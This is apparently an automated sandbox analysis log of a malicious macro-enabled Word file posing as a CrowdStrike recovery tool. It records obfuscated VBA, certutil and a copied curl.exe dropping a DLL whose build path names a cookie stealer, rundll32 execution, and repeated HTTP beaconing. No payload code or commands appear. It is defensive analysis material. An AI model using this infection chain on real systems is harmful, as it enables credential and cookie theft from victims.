Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: msasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\curl.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cabinet.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptui.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: certca.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netapi32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntdsapi.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: version.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: secur32.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: samcli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: dsrole.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: logoncli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: netutils.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\certutil.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: version.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exeSection loaded: profapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0D43FE01-F093-11CF-8940-00A0C9054228}\InprocServer32Jump to behavior
Source: Templates.LNK.0.drLNK file: ..\..\Templates
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.LNK.0.drLNK file: ..\..\..\..\..\Desktop\New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image1.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image2.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = word/media/image3.jpg
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docmInitial sample: OLE zip file path = docProps/custom.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRC0000.tmp.26.drInitial sample: OLE zip file path = word/media/image1.jpg
Source: ~WRC0000.tmp.26.drInitial sample: OLE zip file path = word/media/image2.jpg
Source: ~WRC0000.tmp.26.drInitial sample: OLE zip file path = word/media/image3.jpg
Source: ~WRC0000.tmp.26.drInitial sample: OLE zip file path = docProps/custom.xml
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: Binary string: curl.pdb source: xcopy.exe, 0000000A.00000002.2145898386.0000000002C0B000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2149297237.0000000004620000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000B.00000002.2148940386.0000000002928000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000000C.00000002.2154163486.00000000028A8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000000D.00000002.2189227593.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 0000000D.00000000.2155057954.00000000008B5000.00000002.00000001.01000000.00000007.sdmp, xcopy.exe, 0000001E.00000002.2727525467.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2729026809.0000000004760000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 0000001F.00000002.2728920488.0000000002A08000.00000004.00000020.00020000.00000000.sdmp, certutil.exe, 00000020.00000002.2732646936.0000000002D98000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000021.00000002.2767226008.0000000000885000.00000002.00000001.01000000.00000007.sdmp, curl.exe, 00000021.00000000.2733260752.0000000000885000.00000002.00000001.01000000.00000007.sdmp
Source: Binary string: D:\c++\Mal_Cookie_x64\x64\Release\mscorsvc.pdb source: certutil.exe, 0000000E.00000003.2191196676.0000000004907000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000010.00000002.5554128263.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp, certutil.exe, 00000022.00000003.2768980516.0000000004FA2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000024.00000002.4259710787.00007FFD92CEA000.00000002.00000001.01000000.00000008.sdmp
Source: Element design set.dotx.0.drInitial sample: OLE indicators vbamacros = False

Data Obfuscation

barindex
Source: VBA code instrumentationOLE, VBA macro, High number of string operations: Module ThisDocumentName: ThisDocument
Source: C:\Users\user\AppData\Local\Temp\curl.exeCode function: 13_2_0087D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free,13_2_0087D33A
Source: mscorsvc.dll.14.drStatic PE information: section name: _RDATA
Source: C:\Windows\System32\rundll32.exeCode function: 16_2_00007FFD92C4A381 push rdx; ret 16_2_00007FFD92C4A38B
Source: C:\Windows\SysWOW64\xcopy.exeFile created: C:\Users\user\AppData\Local\Temp\curl.exeJump to dropped file
Source: C:\Windows\SysWOW64\certutil.exeFile created: C:\Users\user\AppData\Local\Temp\mscorsvc.dllJump to dropped file

Hooking and other Techniques for Hiding and Protection

barindex
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 8099
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49724
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 49195 -> 8099
Source: unknownNetwork traffic detected: HTTP traffic on port 8099 -> 49195
Source: unknownNetwork traffic detected: HTTP traffic on port 49209 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49209
Source: unknownNetwork traffic detected: HTTP traffic on port 49210 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49210
Source: unknownNetwork traffic detected: HTTP traffic on port 49211 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49211
Source: unknownNetwork traffic detected: HTTP traffic on port 49212 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49212
Source: unknownNetwork traffic detected: HTTP traffic on port 49214 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49214
Source: unknownNetwork traffic detected: HTTP traffic on port 49215 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49215
Source: unknownNetwork traffic detected: HTTP traffic on port 49216 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49216
Source: unknownNetwork traffic detected: HTTP traffic on port 49218 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49218
Source: unknownNetwork traffic detected: HTTP traffic on port 49219 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49219
Source: unknownNetwork traffic detected: HTTP traffic on port 49220 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49220
Source: unknownNetwork traffic detected: HTTP traffic on port 49221 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49221
Source: unknownNetwork traffic detected: HTTP traffic on port 49222 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49222
Source: unknownNetwork traffic detected: HTTP traffic on port 49223 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49223
Source: unknownNetwork traffic detected: HTTP traffic on port 49224 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49224
Source: unknownNetwork traffic detected: HTTP traffic on port 49225 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49225
Source: unknownNetwork traffic detected: HTTP traffic on port 49226 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49226
Source: unknownNetwork traffic detected: HTTP traffic on port 49227 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49227
Source: unknownNetwork traffic detected: HTTP traffic on port 49228 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49228
Source: unknownNetwork traffic detected: HTTP traffic on port 49229 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49229
Source: unknownNetwork traffic detected: HTTP traffic on port 49230 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49230
Source: unknownNetwork traffic detected: HTTP traffic on port 49231 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49231
Source: unknownNetwork traffic detected: HTTP traffic on port 49232 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49232
Source: unknownNetwork traffic detected: HTTP traffic on port 49234 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49234
Source: unknownNetwork traffic detected: HTTP traffic on port 49235 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49235
Source: unknownNetwork traffic detected: HTTP traffic on port 49236 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49236
Source: unknownNetwork traffic detected: HTTP traffic on port 49237 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49237
Source: unknownNetwork traffic detected: HTTP traffic on port 49238 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49238
Source: unknownNetwork traffic detected: HTTP traffic on port 49239 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49239
Source: unknownNetwork traffic detected: HTTP traffic on port 49240 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49240
Source: unknownNetwork traffic detected: HTTP traffic on port 49241 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49241
Source: unknownNetwork traffic detected: HTTP traffic on port 49242 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49242
Source: unknownNetwork traffic detected: HTTP traffic on port 49243 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49243
Source: unknownNetwork traffic detected: HTTP traffic on port 49244 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49244
Source: unknownNetwork traffic detected: HTTP traffic on port 49245 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49245
Source: unknownNetwork traffic detected: HTTP traffic on port 49246 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49246
Source: unknownNetwork traffic detected: HTTP traffic on port 49247 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49247
Source: unknownNetwork traffic detected: HTTP traffic on port 49248 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49248
Source: unknownNetwork traffic detected: HTTP traffic on port 49249 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49249
Source: unknownNetwork traffic detected: HTTP traffic on port 49250 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49250
Source: unknownNetwork traffic detected: HTTP traffic on port 49251 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49251
Source: unknownNetwork traffic detected: HTTP traffic on port 49252 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49252
Source: unknownNetwork traffic detected: HTTP traffic on port 49253 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49253
Source: unknownNetwork traffic detected: HTTP traffic on port 49254 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49254
Source: unknownNetwork traffic detected: HTTP traffic on port 49255 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49255
Source: unknownNetwork traffic detected: HTTP traffic on port 49256 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49256
Source: unknownNetwork traffic detected: HTTP traffic on port 49257 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49257
Source: unknownNetwork traffic detected: HTTP traffic on port 49258 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49258
Source: unknownNetwork traffic detected: HTTP traffic on port 49259 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49259
Source: unknownNetwork traffic detected: HTTP traffic on port 49260 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49260
Source: unknownNetwork traffic detected: HTTP traffic on port 49261 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49261
Source: unknownNetwork traffic detected: HTTP traffic on port 49262 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49262
Source: unknownNetwork traffic detected: HTTP traffic on port 49263 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49263
Source: unknownNetwork traffic detected: HTTP traffic on port 49264 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49264
Source: unknownNetwork traffic detected: HTTP traffic on port 49265 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49265
Source: unknownNetwork traffic detected: HTTP traffic on port 49266 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49266
Source: unknownNetwork traffic detected: HTTP traffic on port 49267 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49267
Source: unknownNetwork traffic detected: HTTP traffic on port 49269 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49269
Source: unknownNetwork traffic detected: HTTP traffic on port 49270 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49270
Source: unknownNetwork traffic detected: HTTP traffic on port 49271 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49271
Source: unknownNetwork traffic detected: HTTP traffic on port 49272 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49272
Source: unknownNetwork traffic detected: HTTP traffic on port 49273 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49273
Source: unknownNetwork traffic detected: HTTP traffic on port 49274 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49274
Source: unknownNetwork traffic detected: HTTP traffic on port 49275 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49275
Source: unknownNetwork traffic detected: HTTP traffic on port 49276 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49276
Source: unknownNetwork traffic detected: HTTP traffic on port 49277 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49277
Source: unknownNetwork traffic detected: HTTP traffic on port 49278 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49278
Source: unknownNetwork traffic detected: HTTP traffic on port 49279 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49279
Source: unknownNetwork traffic detected: HTTP traffic on port 49280 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49280
Source: unknownNetwork traffic detected: HTTP traffic on port 49281 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49281
Source: unknownNetwork traffic detected: HTTP traffic on port 49282 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49282
Source: unknownNetwork traffic detected: HTTP traffic on port 49283 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49283
Source: unknownNetwork traffic detected: HTTP traffic on port 49284 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49284
Source: unknownNetwork traffic detected: HTTP traffic on port 49285 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49285
Source: unknownNetwork traffic detected: HTTP traffic on port 49286 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49286
Source: unknownNetwork traffic detected: HTTP traffic on port 49287 -> 5000
Source: unknownNetwork traffic detected: HTTP traffic on port 5000 -> 49287
